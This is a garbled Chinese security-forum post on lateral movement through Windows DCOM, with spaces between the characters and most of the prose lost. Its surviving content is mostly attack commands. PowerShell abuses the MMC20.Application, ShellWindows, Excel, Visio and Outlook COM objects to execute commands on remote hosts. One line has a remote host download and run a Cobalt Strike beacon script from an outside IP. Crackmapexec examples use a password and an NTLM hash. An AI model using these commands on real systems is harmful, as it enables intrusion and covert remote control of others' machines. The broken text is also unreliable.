[406] 2021-08-22_使用DCOM进行横向渗透

文档创建者:s7ckTeam
浏览次数:4
最后更新:2025-01-16
2021-08-22_使用DCOM进行横向渗透 使 D C O M   a F a   a F a   2 0 2 1 - 0 8 - 2 2   #   , 4 3 *   *   D C O M *   D C O M *   D C O M *   D C O M *   D C O M *   D C O M C S *   I m p a c k e t - d c o m e x e c *   C r a c k m a p e x e c *   *   D C O M D C O M D C O M D i s t r i b u t e d   C o m p o n e n t   O b j e c t   M o d e l D C O M C O M D L L W i n d o w s C O M D C O M D C O M D C O M P o w e r s h e l l G e t - C i m I n s t a n c e   W i n 3 2 _ D C O M A p p l i c a t i o n D c o m P o w e r s h e l l 3 . 0 W i n d o w s   S e r v e r 2 0 1 2 P o w e r s h e l l 3 . 0 使 G e t - W m i O b j e c t
P o w e r s h e l l 3 . 0 G e t - W m i O b j e c t D C O M G e t - M e m b e r 使 G e t - M e m b e r M M C #   P S 3 . 0 M M C $ m   =   [ S y s t e m . A c t i v a t o r ] : : C r e a t e I n S T A N C E ( [ t y p e ] : : G e t T y p e F r o m P r o g I D ( " M M C 2 0 . A p p l i c a t i o n " , " 1 2 7 . 0 . 0 . 1 " ) ) #   M M C $ m . D o c u m e n t . A c t i v e V i e w   |   G e t - M e m b e r
D C O M M M C E x e c u t e S h e l l C o m m a n d h t t p s : / / d o c s . m i c r o s o f t . c o m / z h - c n / p r e v i o u s - v e r s i o n s / w i n d o w s / d e s k t o p / m m c / v i e w - e x e c u t e s h e l l c o m m a n d ? r e d i r e c t e d f r o m = M S D N e x e M i n i m z e d M a x i m i z e d R e s t o r e d M i n i m z e d c m d M a x i m i z e d R e s t o r e d c m d 使 M i n i m z e d P S 3 . 0 P S 3 . 0 P S 3 . 0 I D 9 B S h e l l W i n d o w s $ m   =   [ S y s t e m . A c t i v a t o r ] : : C r e a t e I n S T A N C E ( [ t y p e ] : : G e t T y p e F r o m P r o g I D ( " M M C 2 0 . A p p l i c a t i o n " , " 1 2 7 . 0 . 0 . 1 " ) ) $ m . D o c u m e n t . A c t i v e V i e w . E x e c u t e S h e l l C o m m a n d ( " c m d " , $ n u l l , " / c   c a l c " , " M i n i m z e d " ) $ a   =   [ A c t i v a t o r ] : : C r e a t e I n s t a n c e ( [ T y p e ] : : G e t T y p e F r o m C L S I D ( ' 9 B A 0 5 9 7 2 - F 6 A 8 - 1 1 C F - A 4 4 2 - 0 0 A 0 C 9 0 A 8 F 3 9 ' , " 1 2 7 . 0 . 0 . 1 " ) ) $ a . i t e m ( ) . D o c u m e n t . A p p l i c a t i o n . S h e l l E x e c u t e ( " c m d . e x e " , " / c   c a l c . e x e " , " c : w i n d o w s s y s t e m 3 2 " , $ n u l l , 0 )
S h e l l E x e c u t e h t t p s : / / d o c s . m i c r o s o f t . c o m / e n - u s / w i n d o w s / w i n 3 2 / s h e l l / s h e l l - s h e l l e x e c u t e D C O M 使 D C O M 使 I P I P 1 2 C o m
D C O M C S 线 C S P o w e r s h e l l i p 1 3 8 1 4 3 1 4 3 线 1 4 3 1 4 3 W e b 1 4 3 P S 1 3 8 p o w e r s h e l l b e a c o n p o w e r s h e l l p o w e r s h e l l C S h t t p s : / / b l o g . c o b a l t s t r i k e . c o m / 2 0 1 7 / 0 1 / 2 4 / s c r i p t i n g - m a t t - n e l s o n s - m m c 2 0 - a p p l i c a t i o n - l a t e r a l - m o v e m e n t - t e c h n i q u e / I m p a c k e t - d c o m e x e c I m p a c k e t d c o m e x e c p s e x e c w m i e x e c 使 o b j e c t [ A c t i v a t o r ] : : C r e a t e I n s t a n c e ( [ T y p e ] : : G e t T y p e F r o m C L S I D ( ' 9 B A 0 5 9 7 2 - F 6 A 8 - 1 1 C F - A 4 4 2 - 0 0 A 0 C 9 0 A 8 F 3 9 ' , ' 1 9 2 . 1 6 8 . 5 2 . 1 3 8 ' ) ) . i t e m ( ) . D o c u m e n t . A p p l i c a t i o n . S h e l l E x e c u t e ( ' p o w e r s h e l l ' , " - n o p   - w   h i d d e n   - c   i e x ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( ' h t t p : / / 1 9 2 . 1 6 8 . 5 2 . 1 4 3 / b e a c o n . p s 1 ' ) " , ' c : w i n d o w s s y s t e m 3 2 ' , $ n u l l , 0 )
h a s h 使 h a s h e s h a s h 使 C r a c k m a p e x e c C r a c k m a p e x e c s h e l l c m e 使 c m d m m c e x e c m m c s h e l l W i n d o w s e x c e l v i s i o o u t l o o k 1 E x c e l . A p p l i c a t i o n 2 S h e l l B r o w s e r W i n d o w 3 V i s i o . A p p l i c a t i o n 4 O u t l o o k . A p p l i c a t i o n #   c r a c k m a p e x e c   s m b   - - e x e c - m e t h o d   m m c e x e c   - d   .   - u   A d m i n i s t r a t o r   - p   ' p a s s 1 2 3 '   - x   " w h o a m i "   1 9 2 . 1 6 8 . 2 0 4 . 1 8 3 #   H a s h c r a c k m a p e x e c   s m b   - - e x e c - m e t h o d   m m c e x e c   - d   .   - u   A d m i n i s t r a t o r   - H   a a d 3 b 4 3 5 b 5 1 4 0 4 e e a a d 3 b 4 3 5 b 5 1 4 0 4 e e : 5 f b c 3 d 5 f e c 8 2 0 6 a 3 0 f 4 b 6 c 4 7 3 d 6 8 a e 7 6   - x   " w h o a m i "   1 9 2 . 1 6 8 . 2 0 4 . 1 8 3 #   E x c e l . A p p l i c a t i o n $ c o m   =   [ a c t i v a t o r ] : : C r e a t e I n s t a n c e ( [ t y p e ] : : G e t T y p e F r o m p r o g I D ( " E x c e l . A p p l i c a t i o n " , " 1 9 2 . 1 6 8 . 5 2 . 1 3 8 " ) ) $ c o m . D i s p l a y A l e r t s   =   $ f a l s e #   D D E I n i t i a t e $ c o m . D D E I n i t i a t e ( " c m d " , " / c   c a l c " ) #   E x c e l . A p p l i c a t i o n C L S I D $ c o m   =   [ a c t i v a t o r ] : : C r e a t e I n s t a n c e ( [ t y p e ] : : G e t T y p e F r o m C L S I D ( " C 0 8 A F D 9 0 - F 2 A 1 - 1 1 D 1 - 8 4 5 5 - 0 0 A 0 C 9 1 F 3 8 8 0 " , " 1 9 2 . 1 6 8 . 5 2 . 1 3 8 " ) ) #   s h e l l E x e c u t e $ c o m . D o c u m e n t . A p p l i c a t i o n . s h e l l E x e c u t e ( " c a l c " ) #   V i s i o . A p p l i c a t i o n $ c o m   =   [ a c t i v a t o r ] : : C r e a t e I n s t a n c e ( [ t y p e ] : : G e t T y p e F r o m P r o g I D ( " V i s i o . A p p l i c a t i o n " , " 1 9 2 . 1 6 8 . 5 2 . 1 3 8 " ) ) #   s h e l l E x e c u t e $ c o m . [ 0 ] . D o c u m e n t . A p p l i c a t i o n . s h e l l E x e c u t e ( " c a l c . e x e " ) #   V i s i o . A p p l i c a t i o n $ c o m   =   [ a c t i v a t o r ] : : C r e a t e I n s t a n c e ( [ t y p e ] : : G e t T y p e F r o m P r o g I D ( " O u t l o o k . A p p l i c a t i o n " , " 1 9 2 . 1 6 8 . 5 2 . 1 3 8 " ) ) #   O u t l o o k S h e l l . A p p l i c a t i o n $ c o m . c r e a t e O b j e c t ( " S h e l l . A p p l i c a t i o n " ) . s h e l l E x e c u t e ( " C : s h e l l . e x e " )
L i n u x W i n d o w s i m p a c k e t c r a c k m a p e x e c W i n d o w s
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则